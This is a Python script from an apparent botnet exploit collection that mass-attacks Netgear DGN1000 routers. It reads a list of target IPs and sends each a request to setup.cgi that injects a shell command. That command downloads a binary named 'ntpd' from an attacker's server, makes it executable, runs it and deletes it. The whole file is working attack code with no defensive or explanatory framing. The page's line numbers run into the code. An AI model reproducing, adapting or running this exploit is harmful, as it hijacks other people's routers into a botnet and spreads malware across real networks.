Path: blob/master/Botnets/Exploits/DGN1000/dgn1000.py
5038 views
#! python !#12import threading, random, socket, time, sys, requests, re, os34if len(sys.argv) < 3:5print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"6sys.exit()78server_ip = "1.1.1.1" # IP of binary server9vulns = open(sys.argv[1], "r").readlines()10port = int(sys.argv[2]) # PORTS: 80, 8080, 8888, 500011# MAKE SURE TO CONFIGURE URL VARIABLE DEFAULT MIPS BINARY NAME: "ntpd"12class send_payload(threading.Thread):13def __init__ (self, ip):14threading.Thread.__init__(self)15self.ip = str(ip).rstrip('\n')16def run(self):17try:18url = "http://" + self.ip + ":" + port + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://" + server_ip + "/ntpd%20-O%20/var/tmp/ntpd;%20chmod%20777%20/var/tmp/ntpd;%20/var/tmp/ntpd;%20rm%20-rf%20/var/tmp/ntpd&curpath=/¤tsetting.htm=1"19requests.get(url, timeout=8)20print "PAYLOAD SENT: %s"%(self.ip)21except:22pass2324for IP in vulns:25try:26ip = "".join(IP)27ip = ip.replace("\n", "")28t = send_payload(ip)29t.start()30time.sleep(0.09)31except:32pass3334